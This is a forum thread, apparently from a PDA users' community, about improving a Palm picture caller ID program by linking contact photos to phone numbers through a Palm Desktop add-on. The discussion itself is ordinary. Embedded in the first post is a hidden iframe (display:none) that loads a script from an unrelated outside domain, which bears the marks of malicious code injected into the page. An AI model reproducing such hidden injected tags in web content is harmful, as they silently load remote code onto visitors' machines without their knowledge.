Picture Caller ID program

I've been using the PDAAPPS program for picture caller ID and i love it! It's been really cool, and fun to show off... but there are some things that i would change. As discussed in the main thread, obliously larger images and automatic phone number entry... This is my concept.

There is a program caller X-Face address book hack. The program itself isn't all that great, but the idea of it works very well with this photoID concept. What it does is allows you to add a picture to the actual contacts in your address book. If we could just download the pictures directly into our address book like this X-Face hack does, then have that picture automatically associated with every number listed in that entry, it would make the leg work on setting up the program extremely minimal. Possibly create a hack for the Palm Desktop program itself to allow you to add the images to address book entries through that program. Might take some time to develop, but we've already got all the resources we need, all we need now is for somebody to type in the code...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't understand what you mean. Can you better explain what you want?

Let me point out that I wrote the code for using X-Face and the Picons ("Faces") database for the "exmh" mail reader. So, I know all about the X-Face mail header as well as the picon images. I just don't understand what your "concept" is.

the concept is that it's an add-on extention for the palm desktop program as well as a hack for the palm OS. In the palm desltop application, it will add a field to the address book entries allowing you to browse for a picture on your computer. This is how you will associate the pictures with the names in the address book. During a hotsync this pictures will then be downloaded to the palm unit.

The PalmOS hack will then work very similar to how the PCID Hack is working now, but without the need to associate the pictures and the numbers manual on the unit, because they will already be assoiciated with every number in the contact entry that they were associated with in the palm desktop application. So there's no need for the Win9x app to build the PDB file, and no need for the CIDHelper program on the phone to associate the pics with he numbers

Remember folks, Pdaapps has stated that this is coming shortly. Since they have already done all the work, I am inclined to wait for their upgrade rather than take their app and merge it into another one.

Just one guy's opinion....
